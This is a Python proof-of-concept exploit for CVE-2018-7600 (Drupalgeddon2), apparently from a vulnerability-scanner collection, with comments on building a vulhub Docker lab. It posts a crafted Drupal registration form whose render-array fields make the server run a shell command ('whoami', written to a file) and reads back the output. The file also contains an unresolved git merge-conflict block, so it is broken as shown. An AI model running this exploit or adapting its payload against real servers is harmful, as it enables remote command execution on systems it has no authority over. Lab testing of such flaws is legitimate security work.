# coding:utf-8
import requests
import json
'''
git clone https://github.com/vulhub/vulhub.git
cd vulhub/drupal/CVE-2018-7600/
docker-compose build
docker-compose up -d 
docker-compose ps

访问ip:8080
一路安装，选择sqlite数据库

docker-compose down
'''
class c2Class(object):
	def __init__(self):
		self.vulname = 'CVE-2018-7600'
		self.vulsystem= 'Drupal'
		self.vulversion = '6.x;7.x < 7.58;8.3 < 8.3.9;8.4 < 8.4.6;8.5 < 8.5.1'
		self.refer= 'https://github.com/zhzyker/exphub/blob/master/drupal/cve-2018-7600_cmd.py'
		self.testisok=True

		self.headers={'Content-Type': 'application/x-www-form-urlencoded'}
		self.vulpath='/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
		self.verifypath='/_temp.txt'
		self.cmd= 'whoami | tee %s'%self.verifypath
		self.payload={'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': '%s'%self.cmd}
		self.flag=200
	def c2Func(self,target):
		status=0
		returnData=''
		try:
			url=target.strip('/')+self.vulpath
			# print(url)
			resp=requests.post(url=url,data=self.payload,verify=True,timeout=2)
			# print(url)
			# print(self.payload)
			if self.flag == resp.status_code:
				url2=target+self.verifypath
				cmdresult=resp.json()[0]['data'].split("<span")[0]
<<<<<<< HEAD
				returnData='%s is bad.The vuln is cve-2018-7600.The payloa is [%s],'\
				' the result is [%s].More info u can view [%s]'%(target.strip('/'),url,cmdresult,url2) #
=======
				returnData='%s is bad.The vuln is cve-2018-7600.The payloa is [%s], the result is [%s].More info u can view [%s]'%(target.strip('/'),url,cmdresult,url2) #
>>>>>>> 0236c8ba63ed25c7b585a481d1d6e6081bd6132e
				status=1
		except Exception as e:
			returnData=str(e)
		return status,returnData


if __name__ == '__main__':
	target='http://192.168.128.132:8080'
	pocObj=c2Class()
	print(pocObj.c2Func(target))
